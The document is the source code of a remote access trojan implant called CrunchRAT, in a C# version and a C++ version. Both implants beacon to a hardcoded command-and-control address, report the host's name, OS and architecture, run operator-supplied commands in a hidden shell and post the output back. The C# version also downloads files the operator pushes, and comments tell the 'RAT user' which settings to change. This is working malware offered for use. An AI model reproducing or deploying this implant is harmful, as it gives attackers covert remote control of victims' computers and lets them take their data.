File: Client/implant.cs
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using Microsoft.Win32; // Windows Registry
using System.Threading;
using System.IO;
using System.Net;
using System.Diagnostics; // Process creation

namespace CrunchRAT
{
    class Program
    {
        // Main() function
        static void Main(string[] args)
        {
            string c2 = "192.168.1.135";                                                                // NEEDS CHANGED BY THE RAT USER
            string beaconURL = "https://" + c2 + "/beacon.php";                                         // NEEDS CHANGED BY THE RAT USER
            string updateURL = "https://" + c2 + "/update.php";                                         // NEEDS CHANGED BY THE RAT USER
            int beaconInterval = 30000;                                                                 // NEEDS CHANGED BY THE RAT USER

            while (true)
            {
                string hostname = getHostname();                                                        // Gets system hostname
                string os = getOS();                                                                    // Gets system OS
                string architecture = getArchitecture();                                                // Gets system architecture

                string responseString = beacon(beaconURL, hostname, os, architecture);                  // Beacons

                string taskID = String.Empty;                                                           // Initializes variable that will store task ID
                string taskAction = String.Empty;                                                       // Initializes variable that will store task action
                string taskSecondary = String.Empty;                                                    // Initializes variable that will store task secondary
                
                if (responseString.Contains("<action>command<action>"))                                 // If we have a tasked command to execute
                {
                    string output = String.Empty;                                                       // Initializes variable that will store Standard Output
                    string error = String.Empty;                                                        // Initializes variable that will store Standard Error

                    stripOutTaskInfo(responseString, out taskID, out taskAction, out taskSecondary);    // Strips out the task information (ID, action, and secondary) from the beacon response string

                    runCommand(taskSecondary, out output, out error);                                   // Runs the tasked command and stores the result in output and error variables

                    updateCommand(updateURL, taskID, taskAction, taskSecondary, output, error);         // Updates
                }

                if (responseString.Contains("<action>upload<action>"))                                  // If we have a tasked remote file upload (IE: the RAT user uploaded a file to the C2 and we need to download it)
                {
                    stripOutTaskInfo(responseString, out taskID, out taskAction, out taskSecondary);    // Strips out the task information (ID, action, and secondary)

                    getFile(c2, taskSecondary);                                                         // Downloads the uploaded file

                    updateUpload(updateURL, taskID, taskAction, taskSecondary);                         // Updates
                }
                
                // If statement for <action>download<action> - Add in functionality at a later date

                Thread.Sleep(beaconInterval);                                                           // Sleeps for the user-specified interval
            }
        }
        // End of Main() function


        // The getHostname() function will return the system hostname - Working as of 05-03-16
        static string getHostname()
        {
            string hostname = Environment.MachineName;
            return hostname;
        }
        // End of getHostname() function


        // The getOS() function will return the system OS - Working as of 05-03-16
        static string getOS()
        {
            string os = String.Empty;

            using (RegistryKey registryKey = Registry.LocalMachine.OpenSubKey(@"SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion")) // Disposable - Gets base OS using the Windows Registry
                os = registryKey.GetValue("ProductName").ToString();

            return os;
        }
        // End of getOS() function


        // The getArchitecture() function will return the system architecture - Working as of 05-03-16
        static string getArchitecture()
        {
            string architecture = String.Empty;

            if (Directory.Exists(Path.GetPathRoot(Environment.SystemDirectory) + @"Windows\SysWOW64")) // This directory will only exist on 64-bit systems - Accounts for volume letters other than C:
                architecture = "x64";
            else
                architecture = "x86";

            return architecture;
        }
        // End of getArchitecture() function


        // The beacon() function will beacon to the specified C2 server and return a task (if any) - Working as of 05-03-16
        static string beacon(string beaconURL, string hostname, string os, string architecture)
        {
            string responseString = String.Empty; // Initializes variable in case the beacon fails or nothing is tasked

            try // Tries to beacon
            {
                 HttpWebRequest beaconRequest = (HttpWebRequest)WebRequest.Create(beaconURL);
                beaconRequest.ServicePoint.Expect100Continue = false; // Removes the "Expect 100-Continue" HTTP header
                ServicePointManager.ServerCertificateValidationCallback = delegate { return true; }; // Ignore self-signed SSL errors
                ServicePointManager.DefaultConnectionLimit = 20; // Normally is limited to 2 concurrent requests - http://en.code-bude.net/2013/01/21/3-things-you-should-know-to-speed-up-httpwebrequest/

                string postData = "hostname=" + Uri.EscapeDataString(hostname) + "&os=" + Uri.EscapeDataString(os) + "&architecture=" + Uri.EscapeDataString(architecture); // URL-encoded POST data
                var data = Encoding.UTF8.GetBytes(postData);
                beaconRequest.Method = "POST";
                beaconRequest.ContentType = "application/x-www-form-urlencoded";
                beaconRequest.ContentLength = data.Length;

                using (var stream = beaconRequest.GetRequestStream()) // Disposable
                    stream.Write(data, 0, data.Length);

                var response = (HttpWebResponse)beaconRequest.GetResponse(); // Gets response from the beacon
                responseString = new StreamReader(response.GetResponseStream()).ReadToEnd();  // Stores the beacon response in responseString
            }
            catch // Research if there's a way to implement try without the catch
            {
            }

            return responseString;
        }
        // End of beacon() function
      
        
        // The stripOutTaskInfo() function will strip out and return task information such as the task ID, the task action, and the task secondary - Working as of 05-04-16
        static void stripOutTaskInfo(string responseString, out string taskID, out string taskAction, out string taskSecondary)
        {
            // Parses out task ID
            string startTag = "<id>";
            int startIndex = responseString.IndexOf(startTag) + startTag.Length;
            int endIndex = responseString.IndexOf("<id>", startIndex);
            taskID = responseString.Substring(startIndex, endIndex - startIndex);

            // Parses out task action
            startTag = "<action>";
            startIndex = responseString.IndexOf(startTag) + startTag.Length;
            endIndex = responseString.IndexOf("<action>", startIndex);
            taskAction = responseString.Substring(startIndex, endIndex - startIndex);

            // Parses out task secondary
            startTag = "<secondary>";
            startIndex = responseString.IndexOf(startTag) + startTag.Length;
            endIndex = responseString.IndexOf("<secondary>", startIndex);
            taskSecondary = responseString.Substring(startIndex, endIndex - startIndex);
        }
        // End of stripOutTaskInfo() function


        // The runCommand() function will run the tasked command and return Standard Output and Standard Error - Working as of 05-04-16
        static void runCommand(string command, out string output, out string error)
        {
            Process cmd = new Process();
            cmd.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
            cmd.StartInfo.UseShellExecute = false; // Must be set to false to redirect Standard Output and Standard Error streams
            cmd.StartInfo.FileName = "cmd.exe";
            cmd.StartInfo.Arguments = "/C " + command;
            cmd.StartInfo.RedirectStandardOutput = true;
            cmd.StartInfo.RedirectStandardError = true;
            cmd.Start();

            output = cmd.StandardOutput.ReadToEnd();
            error = cmd.StandardError.ReadToEnd();
        }
        // End of runCommand() function


        // The updateCommand() function will update the command execution task on the C2 server - Working as of 05-08-16
        static void updateCommand(string updateURL, string taskID, string taskAction, string taskSecondary, string output, string error)
        {
            try // Tries to update
            {
                HttpWebRequest beaconRequest = (HttpWebRequest)WebRequest.Create(updateURL);
                beaconRequest.ServicePoint.Expect100Continue = false; // Removes the "Expect 100-Continue" HTTP header
                ServicePointManager.ServerCertificateValidationCallback = delegate { return true; }; // Ignore self-signed SSL errors
                ServicePointManager.DefaultConnectionLimit = 20; // Normally is limited to 2 concurrent requests - http://en.code-bude.net/2013/01/21/3-things-you-should-know-to-speed-up-httpwebrequest/

                string postData = "id=" + taskID + "&action=" + taskAction + "&secondary=" + Uri.EscapeDataString(taskSecondary) + "&output=" + Uri.EscapeDataString(output) + "&error=" + Uri.EscapeDataString(error); // URL-encoded POST data            
                var data = Encoding.UTF8.GetBytes(postData);
                beaconRequest.Method = "POST";
                beaconRequest.ContentType = "application/x-www-form-urlencoded";
                beaconRequest.ContentLength = data.Length;

                using (var stream = beaconRequest.GetRequestStream()) // Disposable
                    stream.Write(data, 0, data.Length);
            }
            catch // Research if there's a way to implement try without the catch
            {
            }
        }
        // End of updateCommand() function


        // The updateUpload() function will update the remote file upload task on the C2 server - Working as of 05-08-16
        static void updateUpload(string updateURL, string taskID, string taskAction, string taskSecondary)
        {
            try // Tries to update
            {
                HttpWebRequest beaconRequest = (HttpWebRequest)WebRequest.Create(updateURL);
                beaconRequest.ServicePoint.Expect100Continue = false; // Removes the "Expect 100-Continue" HTTP header
                ServicePointManager.ServerCertificateValidationCallback = delegate { return true; }; // Ignore self-signed SSL errors
                ServicePointManager.DefaultConnectionLimit = 20; // Normally is limited to 2 concurrent requests - http://en.code-bude.net/2013/01/21/3-things-you-should-know-to-speed-up-httpwebrequest/

                string postData = "id=" + taskID + "&action=" + taskAction + "&secondary=" + Uri.EscapeDataString(taskSecondary); // URL-encoded POST data            
                var data = Encoding.UTF8.GetBytes(postData);
                beaconRequest.Method = "POST";
                beaconRequest.ContentType = "application/x-www-form-urlencoded";
                beaconRequest.ContentLength = data.Length;

                using (var stream = beaconRequest.GetRequestStream()) // Disposable
                    stream.Write(data, 0, data.Length);
            }
            catch // Research if there's a way to implement try without the catch
            {
            }
        }
        // End of updateUpload() function


        // The getFile() function will download the remote uploaded file - Working as of 05-08-16
        static void getFile(string c2, string taskSecondary)
        {
            string filename = Path.GetFileName(taskSecondary);                                  // Gets just the filename from the taskSecondary file path
    
            using (WebClient wc = new WebClient())
            {
                string resource = "https://" + c2 + taskSecondary;
                wc.DownloadFile(resource, filename);
            }
        }
        // End of getFile() function


        // Additional functions here

    }
}

File: Client/implant.cpp
#include <cctype>			// URL encoding
#include <iomanip>			// URL encoding
#include <sstream>			// URL encoding
#include <string>			// URL encoding
#include "stdafx.h"			// WinHttpClient
#include "WinHttpClient.h"	// WinHttpClient
#include <Psapi.h>			// GetModuleBaseName()
#include <iostream>
#include <string>
#include <Windows.h>

using namespace std;

// Start of function prototypes
wstring GetProcessFilename();
wstring GetHostname();
wstring Get32BitOS();
wstring Get64BitOS();
wstring GetArchitecture();
string UTF8Encode(const wstring &PostData);
string URLEncode(const string &Value);
wstring Beacon(const wstring &BeaconURL, const wstring &UserAgent);
wstring ExtractString(const wstring Source, const wstring Start, const wstring End);
wstring ExecuteCommand(const wstring &BeaconResponse);
void CommandUpdate(const wstring &UpdateURL, const wstring &UserAgent, const wstring &CommandOutput, const wstring &Id, const wstring &Action, const wstring &Secondary);
// End of function prototypes

#pragma comment(lib, "Psapi.lib") // GetModuleBaseName()

int main()
{
	wstring BeaconURL = L"http://192.168.1.135/beacon.php"; // **** Needs changed by user ****
	wstring UpdateURL = L"http://192.168.1.135/update.php"; // **** Needs changed by user ****
	wstring UserAgent = L"Test";							// **** Needs changed by user ****
	int BeaconInterval = 10000;								// **** Needs changed by user ****

	// Infinite loop
	while (true)
	{
		wstring BeaconResponse = Beacon(BeaconURL, UserAgent); // Beacons and stores response in "BeaconResponse"

		// Code modified from http://stackoverflow.com/questions/2340281/check-if-a-string-contains-a-string-in-c
		// If BeaconResponse contains a tasked command
		if (BeaconResponse.find(L"<action>command</action>") != wstring::npos)
		{
			// Parses task information
			wstring Id = ExtractString(BeaconResponse, L"<id>", L"</id>");
			wstring Action = ExtractString(BeaconResponse, L"<action>", L"</action>");
			wstring Secondary = ExtractString(BeaconResponse, L"<secondary>", L"</secondary>");
			
			wstring CommandOutput = ExecuteCommand(Secondary); // Executes tasked command and saves output in "CommandOutput" variable

			CommandUpdate(UpdateURL, UserAgent, CommandOutput, Id, Action, Secondary); // Updates command output to C2 server
		}

		// If statement to determine if BeaconResponse contains <action>upload</action> here

		// If statement to determine if BeaconResponse contains <action>download</action> here

		Sleep(BeaconInterval);
	}

	return 0;
}
// End of main() function


// Gets the current proccess' filename
// Returns "ProcessFilename" wstring
wstring GetProcessFilename()
{
	HANDLE hProcess = GetCurrentProcess(); // Gets handle to current process

	wchar_t Filename[MAX_PATH]; // 260 characters
	GetModuleBaseName(hProcess, NULL, Filename, MAX_PATH); // Returns just the process filename from the handle

	wstring ProcessFilename = Filename; // Convert to wstring
	return ProcessFilename;
}
// End of GetProcessFileName() function


// Gets the system hostname
// Returns "Hostname" wstring
wstring GetHostname()
{
	wchar_t Buffer[MAX_COMPUTERNAME_LENGTH + 1]; // MAX_COMPUTERNAME_LENGTH + 1 per MSDN
	DWORD Size;
	GetComputerName(Buffer, &Size); // Gets the NetBIOS name of the local computer

	wstring Hostname = Buffer; // Converts to wstring
	return Hostname;
}
// End of GetHostname() function


// Gets the system OS for x86 systems
// Returns "OperatingSystem" wstring
wstring Get32BitOS()
{
	HKEY hRegistry = NULL;
	RegOpenKey(HKEY_LOCAL_MACHINE, L"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", &hRegistry); // Opens a handle to the Registry

	DWORD Size;
	RegQueryValueEx(hRegistry, L"ProductName", NULL, NULL, NULL, &Size); // Queries the size (in bytes) for the "ProductName" Registry key - Will save size (in bytes) including null-terminator in "size" DWORD

	wchar_t Buffer[256];
	RegQueryValueEx(hRegistry, L"ProductName", NULL, NULL, (LPBYTE)&Buffer, &Size); // Queries the "ProductName" Registry key and stores output in buffer

	RegCloseKey(hRegistry); // Closes the Registry handle

	wstring OperatingSystem = Buffer; // Converts to wstring
	return OperatingSystem;
}
// End of Get32BitOS() function


// Gets the system OS for x64 systems
// Returns "OperatingSystem" wstring
wstring Get64BitOS()
{
	HKEY hRegistry = NULL;
	RegOpenKey(HKEY_LOCAL_MACHINE, L"SOFTWARE\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion", &hRegistry); // Opens a handle to the Registry

	DWORD Size;
	RegQueryValueEx(hRegistry, L"ProductName", NULL, NULL, NULL, &Size); // Queries the size (in bytes) for the "ProductName" Registry key - Will save size (in bytes) including null-terminator in "size" DWORD

	wchar_t Buffer[256];
	RegQueryValueEx(hRegistry, L"ProductName", NULL, NULL, (LPBYTE)&Buffer, &Size); // Queries the "ProductName" Registry key and stores output in buffer

	RegCloseKey(hRegistry); // Closes the Registry handle

	wstring OperatingSystem = Buffer; // Converts to wstring
	return OperatingSystem;
}
// End of Get64BitOS() function


// Gets the system architecture - DOES NOT TAKE INTO ACCOUNT NON C: SYSTEM DRIVES (IE: OTHER DRIVE LETTERS)
// Returns "Architecture" wstring
wstring GetArchitecture()
{
	wstring Architecture;
	BOOL Exists = PathFileExists(L"C:\\Windows\\SysWOW64"); // Determines if C:\Windows\SysWOW64 directory exists

	if (Exists == TRUE) // If true then the system architecture is x64
		Architecture = L"x64";
	else // Else the system architecture is x86
		Architecture = L"x86";

	return Architecture;
}
// End of GetArchitecture() function


// Obtained from http://stackoverflow.com/questions/36774547/httpsendrequest-post-data-not-supporting-unicode
// Used to convert POST data from UTF-16 (wstring) to UTF-8 (string)
// Returns UTF-8 "Output" string
string UTF8Encode(const wstring &PostData)
{
	string Output;
	int len = WideCharToMultiByte(CP_UTF8, 0, PostData.c_str(), PostData.length(), NULL, 0, NULL, NULL);
	if (len > 0)
	{
		Output.resize(len);
		WideCharToMultiByte(CP_UTF8, 0, PostData.c_str(), PostData.length(), &Output[0], len, NULL, NULL);
	}
	return Output; // Returns UTF-8 string to the calling function
}
// End of UTF8Encode() function


// Code obtained from http://stackoverflow.com/questions/154536/encode-decode-urls-in-c
// Returns URL-encded string "Escaped"
string URLEncode(const string &Value) {
	ostringstream Escaped;
	Escaped.fill('0');
	Escaped << hex;

	for (string::const_iterator i = Value.begin(), n = Value.end(); i != n; ++i)
	{
		string::value_type c = (*i);

		// Keep alphanumeric and other accepted characters intact
		if (isalnum(c) || c == '-' || c == '_' || c == '.' || c == '~') {
			Escaped << c;
			continue;
		}

		// Any other characters are percent-encoded
		Escaped << uppercase;
		Escaped << '%' << setw(2) << int((unsigned char)c);
		Escaped << nouppercase;
	}

	return Escaped.str();
}
// End of URLEncode() function


// Beacons to the specified C2 server
// Returns "Response" wstring
wstring Beacon(const wstring &BeaconURL, const wstring &UserAgent)
{
	WinHttpClient Beacon(BeaconURL);
	Beacon.SetUserAgent(UserAgent);
	Beacon.SetProxy(L"127.0.0.1:9999");	// DEBUGGING - REMOVE LATER

	string PostData;

	if (GetArchitecture() == L"x86") // If system architecture is x86 so we need to call the 32-bit version of getOS()
		PostData = "hostname=" + URLEncode(UTF8Encode(GetHostname())) + "&os=" + URLEncode(UTF8Encode(Get32BitOS())) + "&architecture=" + UTF8Encode(GetArchitecture()) + "&pid=" + to_string(GetCurrentProcessId()) + "&pfilename=" + URLEncode(UTF8Encode(GetProcessFilename())); // POST data
	else // Else system architecture is x64 so we need to call the 64-bit version of getOS()
		PostData = "hostname=" + URLEncode(UTF8Encode(GetHostname())) + "&os=" + URLEncode(UTF8Encode(Get64BitOS())) + "&architecture=" + UTF8Encode(GetArchitecture()) + "&pid=" + to_string(GetCurrentProcessId()) + "&pfilename=" + URLEncode(UTF8Encode(GetProcessFilename())); // POST data

	Beacon.SetAdditionalDataToSend((BYTE *)PostData.c_str(), PostData.size());
	wstring ContentLength = to_wstring(PostData.length()); // We need to create new wstring for the "Content-Length" so we can append to the other headers

	wstring Headers = L"Content-Length: ";
	Headers += ContentLength;
	Headers += L"\r\nContent-Type: application/x-www-form-urlencoded; charset=utf-8\r\n";
	Beacon.SetAdditionalRequestHeaders(Headers); // Appends headers above

	Beacon.SendHttpRequest(L"POST"); // Sends the POST request

	wstring Response = Beacon.GetResponseContent(); // Gets POST respone and stores in "response" wstring

	return Response;
}
// End of Beacon() function


// Code modified from http://blog.mrroa.com/2013/06/06/tiptrick-how-to-retrieve-a-sub-string-between-two-delimiters-using-c/
// Extracts task information
// IE: Calling ExtractString(BeaconResponse, L"<id>", L"</id>"); will return the task ID
// Returns "Stripped" wstring
wstring ExtractString(const wstring Source, const wstring Start, const wstring End)
{
	wstring EmptyString;
	size_t StartIndex = Source.find(Start);

	// If the starting delimiter is not found - Exits function
	if (StartIndex == string::npos)
		return EmptyString;

	// Adds the length of the delimiter to our starting index
	// This will move us to the beginning of our substring.
	StartIndex += Start.length();

	// Looks for the end delimiter
	wstring::size_type EndIndex = Source.find(End, StartIndex);

	// Returns the substring between the start index and the end index
	wstring Stripped = Source.substr(StartIndex, EndIndex - StartIndex);
	return Stripped;
}

// End of ExtractString() function


// Code modified from http://www.cplusplus.com/forum/unices/28134/
// Runs the tasked command usng popen() and gets the output
// Returns "output" wstring
wstring ExecuteCommand(const wstring &Secondary)
{
	wstring Temp = L" 2>&1"; // Necessary to redirect Standard Error to Standard Output
	wstring Command = Secondary.data() + Temp; // Janky but this is necessary

	wchar_t Buffer[256];
	wstring Output;

	FILE* pipe = _wpopen(Command.data(), L"r");

	while (!feof(pipe))
	{
		if (fgetws(Buffer, 256, pipe) != NULL)
		{
			Output += Buffer;
		}

	}

	_pclose(pipe); // Closes pipe

	return Output;
}
// End of ExecuteCommand() function


// Updates task output to the specified C2 server
// Doesn't return anything
void CommandUpdate(const wstring &UpdateURL, const wstring &UserAgent, const wstring &CommandOutput, const wstring &Id, const wstring &Action, const wstring &Secondary)
{
	WinHttpClient Update(UpdateURL);
	Update.SetUserAgent(UserAgent);
	Update.SetProxy(L"127.0.0.1:9999");	// DEBUGGING - REMOVE LATER

	string PostData;

	if (GetArchitecture() == L"x86") // If system architecture is x86 so we need to call the 32-bit version of getOS()
		PostData = "hostname=" + URLEncode(UTF8Encode(GetHostname())) + "&os=" + URLEncode(UTF8Encode(Get32BitOS())) + "&architecture=" + UTF8Encode(GetArchitecture()) + "&id=" + UTF8Encode(Id) + "&action=" + UTF8Encode(Action) + "&secondary=" + URLEncode(UTF8Encode(Secondary)) + "&output=" + URLEncode(UTF8Encode(CommandOutput)); // POST data
	else // Else system architecture is x64 so we need to call the 64-bit version of getOS()
		PostData = "hostname=" + URLEncode(UTF8Encode(GetHostname())) + "&os=" + URLEncode(UTF8Encode(Get64BitOS())) + "&architecture=" + UTF8Encode(GetArchitecture()) + "&id=" + UTF8Encode(Id) + "&action=" + UTF8Encode(Action) + "&secondary=" + URLEncode(UTF8Encode(Secondary)) + +"&output=" + URLEncode(UTF8Encode(CommandOutput)); // POST data

	Update.SetAdditionalDataToSend((BYTE *)PostData.c_str(), PostData.size());
	wstring ContentLength = to_wstring(PostData.length()); // We need to create new wstring for the "Content-Length" so we can append to the other headers

	wstring Headers = L"Content-Length: ";
	Headers += ContentLength;
	Headers += L"\r\nContent-Type: application/x-www-form-urlencoded; charset=utf-8\r\n";
	Update.SetAdditionalRequestHeaders(Headers); // Appends headers above

	Update.SendHttpRequest(L"POST"); // Sends the POST request
}
// End of Update() function
